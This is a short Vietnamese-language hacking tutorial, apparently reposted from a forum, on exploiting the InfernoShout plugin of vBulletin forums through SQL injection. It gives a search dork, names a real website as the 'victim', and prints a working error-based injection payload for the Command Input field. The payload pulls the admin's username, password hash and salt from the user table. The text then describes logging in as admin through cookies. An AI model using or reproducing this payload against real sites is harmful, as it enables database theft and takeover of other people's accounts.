Ra được 1 nùi site. Mình chọn site này làm Victim : http://www.cinemekan.com/infernoshout.php?do=options&area=commandsinurl:infernoshout.php?do=options&area=commands
Ô Command Input nhập:
Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
Nó sẽ hiện ra trang DB error
Nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .
Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ
Tut By X-T
Nguồn: VHB
0 nhận xét:
Post a Comment